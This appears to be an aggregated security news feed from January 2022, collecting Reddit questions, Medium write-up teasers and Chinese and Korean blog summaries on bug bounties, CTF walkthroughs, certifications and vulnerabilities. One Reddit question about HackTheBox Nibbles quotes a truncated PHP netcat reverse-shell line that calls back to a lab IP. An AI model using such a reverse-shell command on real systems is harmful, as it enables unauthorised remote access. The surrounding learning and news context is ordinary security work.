    Get acquainted with the undocumented low-level yet powerful APIs from winternls and how to use the NtQuerySystemInformation function to get a list of all the processes running in the system. https://tbhaxor.com/windows-process-listing-using-ntquerysysteminformation/ submitted by /u/tbhaxor [link] [comments]
    Get expert training on advanced hunting
    submitted by /u/dmchell [link] [comments]
  • Open

    MSRC researcher recognition and CEO of DSPH at 18 years
    Hi everyone,  It was 7 January 2022 when I woke up from sleep I saw an email from MSRC i thought it must be related to the vulnerability… Continue reading on Medium »  ( 1 min )
    Research on Host Header Injection — Cyber Sapiens Internship Task-11
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Research on XML eXternal Entity Injection (XXE)-Cyber Sapiens Internship Task-10
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    Research on HTML Injection- Cyber Sapiens Internship Task-9
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 3 min )
    IDOR: A BEGINNER’S GUIDE
    IDOR is a type of access control vulnerability. IDOR vulnerability can occur when user-supplied input is received by the web server to ret Continue reading on Medium »  ( 2 min )
    How to remove crap using ‘cut’ cmd from Httprobe output?
    Default output from httprobe looks like; In certain conditions as ➖ Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-01-08 Review
    有用的无用模型:网络安全中复杂问题的建模方法 by ourren APT新趋势:战略性休眠域名利用率提升,检测困难 by ourren 2021年网络安全产业态势总结 by ourren 2021 年全球主要网络安全威胁发展态势 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-08 Review
    有用的无用模型:网络安全中复杂问题的建模方法 by ourren APT新趋势:战略性休眠域名利用率提升,检测困难 by ourren 2021年网络安全产业态势总结 by ourren 2021 年全球主要网络安全威胁发展态势 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    How does SAMBA differ between NULL authentication and anonymous authentication?
    Context: I am a penetration tester and I am trying to learn more deeply about SMB. I use the tool crackmapexec to enumerate SMB, and I recently came across something weird when trying the following commands: - crackmapexec smb IP This sets the Domain name, User name, and Host name to NULL - crackmapexec smb IP -u '' -p '' This sets the Domain name, but sets the User name, and Host name to NULL - crackmapexec smb IP -u 'anything' -p '' This sets the Domain name, User name, and Host name This made me wonder, why does SAMBA treat any username as an anonymous login? Question: I've been looking through the SAMBA documentation (which is horrible someone please change this), to find what allows/disallows NULL and anonymous authentication. However, I have been unable to find what settings allow these. submitted by /u/jakeyee [link] [comments]
    book suggestions for highly technical subjects
    Hi Reddit, I'm looking for books similar to The ShellCoder Handbook but with updated contents. I'm focused on the exploit dev part. But anything else is also fine as long as it's highly technical. submitted by /u/ak_z [link] [comments]
    Spyware paranoia and tools to use to scan
    I have been suspecting a long-term 'friend' of mine has been spying on me for a while now due to suspicious things they say and suspicious activity in general. Their motivation I suspect due to their personality and history (if they are indeed spying on me) is just to fuck with me or to gather information on me for later usage. I would like to know of any tools I can use to discover any keyloggers, screen capturers, or other types of spyware that can access my social media accounts, browser, or just my device in general. I have scanned my device with a malware scanner and windows defender already, but nothing major has been discovered. I'm wondering if I should do a rootkit scan as well? Thanks Edit: Obviously, I'm aware this is an unlikely scenario, but there have just been a lot of big 'coincidences' that have been bugging me and I'm trying to do some research. If you ignore the background story, I guess I'm just trying to find out current/relevant possible attack vectors/specific tools for low-level personal spying (hardware, software, and network-based). And then, the appropriate tools and methods a defender would use. I apologise that this seems to be the wrong subreddit but I would appreciate any redirects to relevant subreddits/external resources. submitted by /u/Large-Run9434 [link] [comments]
  • Open

    Project to Regularly and Automatically Update Docker Images that contains a lot of NetSec related tools
    submitted by /u/deleee [link] [comments]
  • Open

    被忽视的NTP安全
    时间是我们平时最关注,而最有不关注的问题,但是针对时间NTP协议的攻击所带来的危害是非常巨大的,需要引起我们的关注。
  • Open

    Zest와 ZAP! 강력한 보안 테스트 루틴을 만들어봐요 ⚡️
    What is Zest Zest는 Mozilla 보안팀에서 만든 JSON 기반의 스크립팅 언어입니다. 보다 쉬운 웹 테스팅을 위해서 만들어졌고, 저는 테스팅 시 ZAP에서 자주 사용합니다. Zest in ZAP 사실 JSON 포맷 자체가 rewrite가 좋은 포맷은 아니라서(그래서 config는 yaml이나 toml을 많이 쓰죠) 직접 작성하면서 쓰기에는 좀 불편한 감이 많이 있습니다. 다만 이 Zest가 ZAP 안에서 사용하는 경우 GUI Interface를 통해 로직을 통제할 수 있기 때문에 이러한 불편함은 사라지게 됩니다. Zest Structure Zest는 JSON 포맷으로 스크립트의 타입, 파라미터 등을 명시할 수 있습니다.
    [Cullinan #25] 앞으로의 계획
    컬리넌 로그 #25입니다. 사실 이번에는 업데이트 로그라기 보단 앞으로의 계획을 좀 더 공유드릴까 해서 작성해봅니다. Cullinan이란? 먼저 Cullinan은 제가 작년 3월부터 시작한 토이 프로젝트로 흩어진 블로그 글을 하나의 위키 형태로 모으고 지속적으로 관리할 수 있도록 하는 프로젝트였습니다. 그 시작은 여기에 있네요. 기존의 글들을 모아 하나의 항목으로 만들고, 또 제가 안다뤘었던 항목들도 하나하나 추가하다보니 벌써 41개의 페이지가 생겼습니다. 앞으로도 많은 항목을 추가할껀데(노션에 작성중인게 잔뜩 쌓여있습니다 😅), 이제는 이를 표현하는 방법에 대해서도 조금 더 고민할까 합니다.

  • Open

    Timing-Based Username Enumeration: What’s a fix versus mitigation?
    For web-based applications, Timing-based Username Enumeration is a great find. For testers it’s low-hanging fruit and a great way to… Continue reading on Medium »
    December UI/UX Contest Winner
    and our $425 prize winner is…🏆 Continue reading on SW DAO »  ( 1 min )
    A Cool Account Takeover Vulnerability due to lack of Client Side Validation
    Hello Everyone, My Name is Arth Bajpai , I’m from Lucknow India and this is my First writeup related to bug bounty Continue reading on Medium »  ( 2 min )
    Tinyman Bug Bounty Campaign
    Tinyman announces bug bounty campaign. Continue reading on Medium »  ( 1 min )
    Being Anonymous on the Internet(proxychains)
    Proxy chains Continue reading on Medium »  ( 1 min )
    Bypassing Door Passwords
    Instead of a key, this type of lock system requires a numerical code to grant entry to a facility or property. The code is punched in by… Continue reading on Medium »  ( 1 min )
    GYSR Bug Bounty Program
    Our highest priority has always been safety and security. Introducing the GYSR bug bounty program in partnership with Immunefi. Continue reading on GYSR »  ( 1 min )
    XXE — TryHackme WriteUp
    XML External Entity Writeup Continue reading on InfoSec Write-ups »  ( 2 min )
    How i got financial advisor by simply hack into their membership plan !
    Hello Infosec geeks Continue reading on Medium »  ( 1 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time. Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Received a Performance Evaluation yesterday
    First time poster here. Previous post for context: https://www.reddit.com/r/SecurityCareerAdvice/comments/rc6awd/i_passed_iso_27001_at_the_company_i_work_for/ As the title says, I got a performance evaluation today with a raise! One thing they asked me to look into is to find credentials (IT Standards like 27K1) to improve the organization. We just passed ISO 27001, so I'm guessing they are looking to expand themselves with additional credentials (IT Standards like 27K1). Any ideas? FYI, the company is a software-as-a-service business. submitted by /u/LordCommanderTaurusG [link] [comments]  ( 1 min )
    Internal Log4J attempts?
    hey guys, I understand somewhat how the exploit works but when you see in the logs a log4j exploit attempt that is internal to internal attempting a request for an outside LDAP server. How could that happen exactly? As in how was that request made in the first place? Does it mean the internal machine was exploited or is it just a request attempt through another means? If the machine is not vulnerable to make outgoing requests, is it just a case of blocking the server IP? Or is the mere fact that an attempt was made indicate vulnerability? Hopefully that made sense! Thanks submitted by /u/_illusions25 [link] [comments]  ( 1 min )
    How best to send sensitive personal identity documents to new employer?
    Starting a new job remotely and they've hit me via email with the I-9 Form, W4, and Direct Deposit Paychex form. So the forms have my SSN, bank details and personal info + my passport as an additional identity document. How do I send this stuff responsibly? I was thinking I could password protect each PDF inside a zip file and then call them to give them the password. What software do I need to encrypt these PDFs? Any recommendations or advice on a best practice here? submitted by /u/ChampionSSJ [link] [comments]  ( 2 min )
    CISSP Advice
    Just like that title says, what advice would you give someone that will begin studying for this cert. Like is there a specific book, study guide/resources you’d recommend? I know there is a ton of material out there but some is hard to follow. Recent test takers advice is appreciated. Thanks! submitted by /u/zzizourm [link] [comments]  ( 3 min )
    CEH and CEH Master worth it
    is the CEH and CEH Practical worth taking if I am in my junior year in computer science? will it help at least land me an interview in a company? is it accredited in Canada? [Edit] Thank you so much for your comments, I will be shifting to eJPT and maybe CISSP after. submitted by /u/deadmeme-1 [link] [comments]  ( 4 min )
  • Open

    NPM might be executing malicious code in your CI without your knowledge
    submitted by /u/words_are_sacred [link] [comments]  ( 1 min )
    Mutual Authentication: A Component of Zero Trust
    submitted by /u/alexfornuto [link] [comments]
    Lopsided routing, a stealthy hole punch into FortiGate
    submitted by /u/oherrala [link] [comments]  ( 1 min )
    PHP 7.3-8.1 disable_functions bypass using string concatenation (PoC)
    submitted by /u/dradzenglor [link] [comments]
  • Open

    Bypass Cloudflare
    My leak bot https://twitter.com/leak_scavenger for a long time crawled the website ghostbin.co. Some of you asked how my bot is able to do… Continue reading on Medium »  ( 2 min )
    OSINT — Obter o E-mail de um Perfil do Linkedin
    Devido aos vazamentos de dados do Linkedin algumas informações como o ID e o E-mail do perfil do usuário foram disponibilizados no… Continue reading on 100security »  ( 1 min )
  • Open

    thefLink/Hunt-Sleeping-Beacons: Aims to identify sleeping beacons
    submitted by /u/dmchell [link] [comments]
    NOBELIUM’s EnvyScout infection chain goes in the registry, targeting embassies
    submitted by /u/dmchell [link] [comments]
    Bypassing Door Passwords w/wo default passwords
    submitted by /u/SocketPuppets [link] [comments]
    EDR Parallel-asis through Analysis - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Email threads about potatoes (recipes, etc)
    submitted by /u/ryankrage77 [link] [comments]
    Google drives were always a debatable content on this sub. Now it seems that the "don't be evil" firm will answer this question for you.
    https://www.techradar.com/news/google-drive-could-soon-start-locking-your-personal-files EDIT: For clarification, your personal data (I guess even copyrighted material) not publicly available (open) are not concerned. But the findings shared here may become more and more rare. submitted by /u/krazybug [link] [comments]  ( 2 min )
    Wide selection of fairly recent magazines, mostly English language, but also German, Dutch and others
    submitted by /u/Dutchlawyer [link] [comments]
    Christmas Movies
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Another music one
    submitted by /u/International_Milk_1 [link] [comments]
    VARIOUS (300 TBS OF STUFF. Tom and Jerry cartoons, K-pop music. courses on bitcoin, and video ediing. Excel for beginners. and so on.
    submitted by /u/International_Milk_1 [link] [comments]
    more music (Some empty folders)
    submitted by /u/International_Milk_1 [link] [comments]
    K-POP. METAL, ROCK
    submitted by /u/International_Milk_1 [link] [comments]
    MUSIC
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    SecWiki News 2022-01-07 Review
    《2021太空安全报告》 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-07 Review
    《2021太空安全报告》 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    预计 2025 年,反病毒软件市场规模将达到 45.4 亿美元
    2025年,反病毒软件市场规模预计将达到45.4亿美元。  ( 1 min )
    FreeBuf早报 | 上海首笔数字人民币就业补贴落地;VMware 解决产品中堆溢出漏洞
    能将相应的数据验证和交叉比对,为打击违法犯罪提供信息支持。  ( 1 min )
    Bandit通关记录【linux基础命令学习】
    Bandit是一个学习Linux的网站,它采用游戏通关的方式来帮助我们学习linux基本使用的命令,十分适合没有基础或基础较弱的同学学习,本篇通关了所有关卡并对相关知识进行了记录和收集。  ( 1 min )
    时间定了!CIS 2021网络安全创新大会Spring·春日版来袭
    大会已正式定档于3月2日至3日在上海宝华万豪酒店举办。  ( 1 min )
    新人必看!关于dom型xss和反射型xss的区别
    这篇文章可以给新入坑的小白更好的理解xss漏洞,也通过这篇文章巩固一下我对xss的理解,如有不正确的地方欢迎各位师傅斧正。  ( 1 min )
    FreeBuf甲方群讨论 | 聊聊网络安全供应商整合(本期内含彩蛋话题)
    Gartner预测,网络安全供应商整合将成为2022年的行业趋势之一,大多数组织都将供应商整合视为提高安全性的途径。  ( 1 min )
    新年伊始,斗象科技收到2022年的第一次认可
    新的一年,斗象科技将勤修内功,以更加卓越的产品和服务,更好地完成各项任务。
    FreeBuf周报 | NoReboot恶意软件让iPhone假装关机;看视频时,黑客窃取信用卡信息
    我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    NoReboot恶意软件让iPhone假装关机
    该技术直接模拟了用户iPhone设备关机时的情景,禁用了大多数的物理反馈,因此iPhone看起来跟真的关机了一样。  ( 1 min )
    黑客盗窃加密货币使用了哪些“手段”?
    以下是有史以来五大加密货币盗窃案的汇总,或许能发现一些加密货币被盗的规律。  ( 1 min )
    FinalSite遭受勒索软件攻击,数千个学校网站无法访问
    近年来,学校已成为勒索攻击的热门目标,尤其是一些安全建设资金有限的K12学校。  ( 1 min )
    华米科技招聘高级安全工程师
    华米科技创立于2013年是一家全球领先的智能可穿戴创新公司,希望通过“云健康云服务+端可穿戴终端+芯芯片”的布局以科技的力量推动全球每个人享有更好的运动、健康及医疗服务。
    安全知识图谱 | Log4j事件云端数据分析
    实现高级威胁的精准和快速定位  ( 1 min )
    利用AppInfo RPC服务的UAC Bypass技术详解
    在我们先前的攻击技术研判中曾介绍了一种较新的UAC Bypass在野利用手法,本文将再次对其技术细节进行深入分析。  ( 1 min )
  • Open

    Detecting Web Attacks Using A Convolutional Neural Network
    Introduction  ( 4 min )
    Authorization bypass — Gmail
    About the vulnerability  ( 3 min )
    Day 4, CN-Network Topologies #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    [IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty
    Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the…  ( 2 min )
  • Open

    Detecting Web Attacks Using A Convolutional Neural Network
    Introduction  ( 4 min )
    Authorization bypass — Gmail
    About the vulnerability  ( 3 min )
    Day 4, CN-Network Topologies #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    [IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty
    Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the…  ( 2 min )
  • Open

    Detecting Web Attacks Using A Convolutional Neural Network
    Introduction  ( 4 min )
    Authorization bypass — Gmail
    About the vulnerability  ( 3 min )
    Day 4, CN-Network Topologies #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    [IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty
    Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the…  ( 2 min )
  • Open

    7+ Major Reasons to Hire a Red Team to Harden Your App Sec
    The growing cyberthreat landscape has brought a storm in the online marketplace. From the online studies and research, there were around… Continue reading on Medium »  ( 4 min )
  • Open

    Exploiting Redash instances with CVE-2021-41192
    Article URL: https://ian.sh/redash Comments URL: https://news.ycombinator.com/item?id=29834624 Points: 1 # Comments: 0  ( 5 min )
  • Open

    Is it possible to extract WhatsApp data from this type of scenario?
    Phone: Iphone XS (A12 chip) [Wipe data after 10 attempts is ON] Passcode: Unkown iOS Ver: 14.7 Mode: AFU WhatsApp: 2FA Active I have access to UFED, Oxygen, XRY also I have budget more tools if there is any tool that is capable of doing it. Thank you in advance. submitted by /u/wtfisgoingong1 [link] [comments]  ( 1 min )

  • Open

    Unprotected directory of [NSFW] videos and images from internet sex work
    submitted by /u/Shark_Octopus [link] [comments]
    Movies
    submitted by /u/International_Milk_1 [link] [comments]
    "Soul, Hip Hop, Rare Grooves, House and Jazz "
    submitted by /u/International_Milk_1 [link] [comments]
    EPISODES of StarTrek-NewVoyages.
    submitted by /u/International_Milk_1 [link] [comments]
    Capybaras
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    movie stills featuring reptiles and amphibians.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    The JNDI Strikes Back – Unauthenticated RCE in H2 Database Console
    submitted by /u/SRMish3 [link] [comments]
    Garlicshare - Private and secure file sharing over the Tor network
    submitted by /u/ILDVUCE [link] [comments]  ( 1 min )
    Announcing the first open source security tool for Heroku!
    submitted by /u/cloud-defender [link] [comments]
    SANS Christmas Challenge 2021 - Write-up
    submitted by /u/the-useless-one [link] [comments]  ( 1 min )
  • Open

    Imagining a live server
    I wanted to ask if there was a good way to create a forensic image of a server that can't be taken offline? ​ Thanks submitted by /u/Pizza_Eating_Robots [link] [comments]  ( 1 min )
    Any free practice images out there
    Hi people, I work within digital forensics and I'm currently off work with covid due to the nature of my job i cannot work from home and was wondering if theres any websites out there that provide disk images for fictional triage / investigation. Thanks in advance submitted by /u/LukeT1123 [link] [comments]  ( 1 min )
  • Open

    Good security certs to obtain for better progression
    Hi I have been working in the information security industry for around 2 years now and recently secured a permanent role in the UK. My roadmap for this year is to obtain security certs and this is what I am planning: CompTIA Security+ Microsoft Azure Fundementals What advice do you have to reach a £75K+ salary in the next two to three years? Thanks submitted by /u/gavxz [link] [comments]  ( 1 min )
    Technicalities in VPN effectivity: Can anyone online tell when you're using a VPN?
    If a VPN disguises your IP address when you use the internet, do internet providers and the websites you visit realise that you're using a VPN or do they get the perfect impression that you're a normal internet user from wherever it is you go with your VPN. For reference, here are a few scenarios where your cover could be compromised: An internet user using an internet company only functional in Australia would be in say, Pakistan through a VPN. You lose your connection to your VPN more than once on the same website (so you're switching back and forth between locations in seconds) trackers could not only realise that you're using a VPN but also know your actual location. (It may not be the case that this is how VPN works but:) Among its many available locations, say for example you chose NY, USA, if a VPN provider simply transports all its users choosing NY, USA to one precise location in NY, wouldn’t it be clear that all that activity coming from one spot, down to the coordinate isn’t really thousands of computers crammed in one area but people using the same VPN service. I have loads of thoughts on how if someone really really wanted to find your location, they could definitely do so, and how even small windows of error are subject to great scrutiny online. However, it's all dependant on how much of my speculation is actually true. Cheers! This question has been posted on other relevant subreddits as well. submitted by /u/lazariomo [link] [comments]  ( 3 min )
    Digital certificates: why do the certificates not get stolen?
    I am probably missing something here, but I don't get how digital certificates prove the identity of whoever has them. Granted, if someone decrypts a certificate with the public key of a certificate authority and retreives the public key of a certain party, they can know for sure that this authority once signed the certificate request for said party, but can't any given person retreive that certificate from that party, and then start providing it as if it was their own? submitted by /u/Pegasus9208 [link] [comments]  ( 3 min )
    HackTheBox Nibbles: Full TTY Shell how?
    So I'm reading a walkthrough of Nibbles from 0xdf and they used a PHP code like: &1|nc 10.10.15.154 8082 >/tmp/f"); ?> I was stuck for hours trying to get a full TTY shell, and none of the guides on breaking out of limited shell has worked. Clearly, 0xdf knew what he was doing. I want to learn more about what this command is doing: Where does one learn how to do this? Is there more of where this comes from? (I'd like to learn more so I can note it down) What is the logic behind this? Why is this superior to the reverse shell PHP I crafted using MSFVENOM? I'd like to be provided a fishing rod and a lake, rather than the fish. I'd like to learn how to do these things before I read up on how somebody else did it. I'm also okay with paid resources on the subject (books, courses, subscription), as I believe content creators should be paid for their skill and time. submitted by /u/DiickBenderSociety [link] [comments]  ( 1 min )
    Who is hosting the most malware?
    I would like to know from your experience where have you seen the most malware, most often, if you would have to choose between IBM networks, DigitalOcean, Microsoft, ATT, Google, Akamai, Github and Amazon networks? submitted by /u/ciovlici [link] [comments]  ( 2 min )
    How do I start building the security team?
    Hello everyone, I'm currently working on a small startup company as the one of the 5 people as admin / engineer / architech / security people / printer fixer / security analyst I realize that the team is quickly burnt out with the variety of task and mountains of unending work on this state. I talk to my boss about this and he agree that something needs to be done. We are planning to hire a third party vendor to do some of the stuff. However, my boss is quite adamant that the security roles muat be done in house and ask me to create a plan on how many division we need to create, how many people to hire etc. Is there any guide out there that can help me with this in CIS style with focus on scalability? So for example in small organization you need at least these teams, later on you can add these teams etc. Or can you guys share how did your organization tackle this challenge? Any input is greatly appreciated. Thanks for sharing submitted by /u/XynderK [link] [comments]  ( 4 min )
  • Open

    Grafana LFI on https://grafana.mariadb.org
    MariaDB disclosed a bug submitted by realtess: https://hackerone.com/reports/1419213
  • Open

    Another simple .NET executable to create and add a backdoor user
    Another simple but useful .NET executable that creates and adds an arbitrary user or domain user to the Local Administrators groups. Very useful for privilege escalations on Windows (i.e. unquoted service path) Repo: https://github.com/notdodo/LocalAdminSharp submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
    Cobalt Strike Sleep Mask IOC
    https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs ​ Recently noticed an IOC of the sleep mask kit while testing my own payloads, being the hook on the sleep() winapi. submitted by /u/CodeXTF2 [link] [comments]
    What Is Red Teaming, How Does It Work and Why Is It Important?
    submitted by /u/stanley9528 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-06 Review
    某系统漏洞挖掘之固件分析 by ourren DataCon2021域名体系安全赛道黑产方向赛题深度解析 by ourren 浅谈数据安全运营能力建设 by ourren 2021年“CCF优秀博士学位论文奖”列表及全文 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-06 Review
    某系统漏洞挖掘之固件分析 by ourren DataCon2021域名体系安全赛道黑产方向赛题深度解析 by ourren 浅谈数据安全运营能力建设 by ourren 2021年“CCF优秀博士学位论文奖”列表及全文 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Utilizando BBRF com foco em Reconnaissance #bugbounty
    Olá tudo bem? Continue reading on Medium »  ( 4 min )
    My First Bug Bounty Report | POST-based XSS
    Hello Ninjas!!!! I am Vishal Barot aka vFlexo and today I decided to publish a write-up on how I got first bounty through my first ever… Continue reading on Medium »  ( 2 min )
    Authorization bypass — Gmail
    About the vulnerability Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Advanced Searching with Google Dorking
    What is Google Dorking? Continue reading on Medium »  ( 2 min )
    Writeup_TryHackMe_Searchlight — IMINT
    As part of OSINT learning, I am working to complete all the Try_Hack_Me rooms which are linked to OSINT research. Continue reading on Medium »
  • Open

    Kerberos Authentication (again… but better)
    On of the most known authentication protocol in Windows environment is Kerberos (RFC 1510 for the V5). Continue reading on Medium »
    What is a red team
    In a red team/blue team cybersecurity simulation, the red team acts as an adversary, attempting to identify and exploit potential… Continue reading on Medium »  ( 3 min )
    CompTIA ITF+
    I was fortunate that the CompTIA ANZ Business Technology Community & Horden Technologies offered a free, entry-level qualification for… Continue reading on Medium »  ( 1 min )
  • Open

    An ‘Attack Path’ Mapping Approach to CVEs 2021-42287 and 2021-42278
    1.0 Introduction On Friday, December 10, 2021, Charlie Clark (@exploitph) published a blog post detailing the weaponization of CVEs 2021-42287 and 2021-42278. In the blog post, Charlie extensively covered the background of the vulnerabilities, how the vulnerabilities were weaponized into Rubeus, with help from Ceri Coburn (@_EthicalChaos_), the full ‘attack chain,’ mitigations, and some detections.... The post An ‘Attack Path’ Mapping Approach to CVEs 2021-42287 and 2021-42278 appeared first on TrustedSec.  ( 7 min )
  • Open

    APT新趋势:战略性休眠域名利用率提升,检测困难
    攻击者越来越倾向于提前注册域名备用,利用这类战略性休眠域名的攻击越来越多。  ( 1 min )
    红日安全靶场三
    目标是要拿到win2012域控服务器中的一份文件。  ( 1 min )
    私人订制,打造白帽子专用移动系统
    为了能够做好针对恶意样本的分析,本文分享一种新型思路——私人订制,打造白帽子专用移动系统!  ( 1 min )
    十大最常见的ATT&CK战术及技术
    Picus研究人员从各种来源收集了超过二十万真实世界威胁样本,确定了样本的战术、技术和程序(TTP),并对每个TTP进行了分类,所有样本超过180万种ATT&CK技术。  ( 1 min )
    FreeBuf 早报 | 诈骗者冒充经纪商骗取投资者5000万美元;购物和网贷诈骗最常见
    “电商刷单,让你在家动动手指就能赚钱”“跟着老师炒股赚大钱”……在网上,用户经常能从各类软件推送中收到类似的消息,这些诱人的“馅饼”背后,却是危险的“陷阱”。  ( 1 min )
    CISA《网络安全事件和漏洞响应手册》提到的SSVC是什么?
    作为一种新的漏洞评估方法,SSVC的特点主要体现为三个“面向”:面向供应链、面向决策结果、面向实践经验。  ( 1 min )
    密码套件:密码,算法和协商安全设置(一)
    但确实密码套件在我们通过Internet建立的每个HTTPS连接中都起着至关重要的作用。  ( 1 min )
    谷歌出手,5 亿美元“拿下”以色列网络安全公司 Siemplify
    路透社披露谷歌旗下云计算部门完成收购以色列网络安全公司Siemplify。  ( 1 min )
    探寻新能量,安全新未来 | 首届「网安新势力」 大会官网正式上线
    第一届「网安新势力」大会官网今天正式上线啦,还不赶紧报名!  ( 1 min )
    本田和讴歌汽车受千年虫影响,时钟倒退到2002年
    本田和讴歌是否真的会让车主等待7个月的时间才能修复这一漏洞吗?
    研究人员揭露了一个长期潜伏的金融盗窃团伙——Elephant Beetle
    该团伙以交易处理系统为目标,从拉美地区的金融实体中窃取资金至少长达4年。  ( 1 min )
    告别脚本小子系列丨JAVA安全(2)——JAVA反编译技巧
    告别脚本小子系列是本公众号新开的一个集代码审计、安全研究和漏洞复现的专题,意在帮助大家更深入的理解漏洞原理和掌握漏洞挖掘的思路和技巧。我们将由浅入深的对java安全相关的技术进行讲解。  ( 1 min )
    数据统计:网络安全事件造成影响及成本
    软件安全是网络安全的基础防线,这也提醒我们从软件开发开始就应重视代码安全建设,提高软件安全性。  ( 1 min )
    Git信息泄露原理解析及利用总结
    在配置不当的情况下,可能会将“.git”文件直接部署到线上环境,这就造成了git泄露问题。  ( 1 min )
  • Open

    Vulnhub: MoneyBox 1 Walkthrough
    I dropped here again to give you my another writeup (wrote 5 months ago!) of the box from vulnhub MoneyBox 1. You can read my blog on…  ( 4 min )
    Vulnhub: Crossroads 1 Walkthrough
    Wuahahahhahaha! Sneaking in again to leave another writeup for ya of the box from vulnhub Crossroads 1. Have a look at my last blog which I…  ( 5 min )
    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF?  ( 4 min )
    Vulnhub: VulnOS 2 Walkthrough
    Hey everyone, here’s a write-up of the box from vulnhub VulnOS 2. I wrote this writeup 5 months ago and am curious to share my notes (how I…  ( 7 min )
    Vulnhub: Pwned 1 Walkthrough
    Back again with the next write-up of the box from vulnhub Pwned 1. You can read the blog I just publish a few moments ago, Vulnhub: VulnOS…  ( 6 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below:  ( 1 min )
  • Open

    Vulnhub: MoneyBox 1 Walkthrough
    I dropped here again to give you my another writeup (wrote 5 months ago!) of the box from vulnhub MoneyBox 1. You can read my blog on…  ( 4 min )
    Vulnhub: Crossroads 1 Walkthrough
    Wuahahahhahaha! Sneaking in again to leave another writeup for ya of the box from vulnhub Crossroads 1. Have a look at my last blog which I…  ( 5 min )
    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF?  ( 4 min )
    Vulnhub: VulnOS 2 Walkthrough
    Hey everyone, here’s a write-up of the box from vulnhub VulnOS 2. I wrote this writeup 5 months ago and am curious to share my notes (how I…  ( 7 min )
    Vulnhub: Pwned 1 Walkthrough
    Back again with the next write-up of the box from vulnhub Pwned 1. You can read the blog I just publish a few moments ago, Vulnhub: VulnOS…  ( 6 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below:  ( 1 min )
  • Open

    Vulnhub: MoneyBox 1 Walkthrough
    I dropped here again to give you my another writeup (wrote 5 months ago!) of the box from vulnhub MoneyBox 1. You can read my blog on…  ( 4 min )
    Vulnhub: Crossroads 1 Walkthrough
    Wuahahahhahaha! Sneaking in again to leave another writeup for ya of the box from vulnhub Crossroads 1. Have a look at my last blog which I…  ( 5 min )
    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF?  ( 4 min )
    Vulnhub: VulnOS 2 Walkthrough
    Hey everyone, here’s a write-up of the box from vulnhub VulnOS 2. I wrote this writeup 5 months ago and am curious to share my notes (how I…  ( 7 min )
    Vulnhub: Pwned 1 Walkthrough
    Back again with the next write-up of the box from vulnhub Pwned 1. You can read the blog I just publish a few moments ago, Vulnhub: VulnOS…  ( 6 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below:  ( 1 min )
  • Open

    'DoorLock' Vulnerability Can Force iOS Devices to Endlessly Reboot
    Article URL: https://www.pcmag.com/news/doorlock-vulnerability-can-force-ios-devices-to-endlessly-reboot Comments URL: https://news.ycombinator.com/item?id=29819095 Points: 2 # Comments: 0  ( 5 min )

  • Open

    Vscode의 유용한 Extensions
    여러분들은 어떤 코드 에디터를 사용하시나요? 저는 학부생 시절부터 vim 유져었었고 이후 vim + geany, atom + vim 을 거쳐 이제 vscode와 vim을 동시에 사용하는 형태로 전환헀습니다. (말이 vim이지 사실 neovim을 써요 😅) 궁금해서 투표 올렸었는데, 예상보다 퍼센트가 훨씬 많이 차이가 났어요 (전 한 7/3 정도 생각했는데..) 어쨌던 vscode로 넘어오게 되면서 vscode의 extension을 찾아보게 됬었는데요, 여러개 설치해보면서 제가 괜찮다고 느꼈던 것들을 공유해볼까 합니다. Atom -> Vscode 저는 사실 Atom에 만족하고 잘 사용하던 유저였습니다.
  • Open

    Anyone use X1 to capture Facebook and are you having issues with it right now?
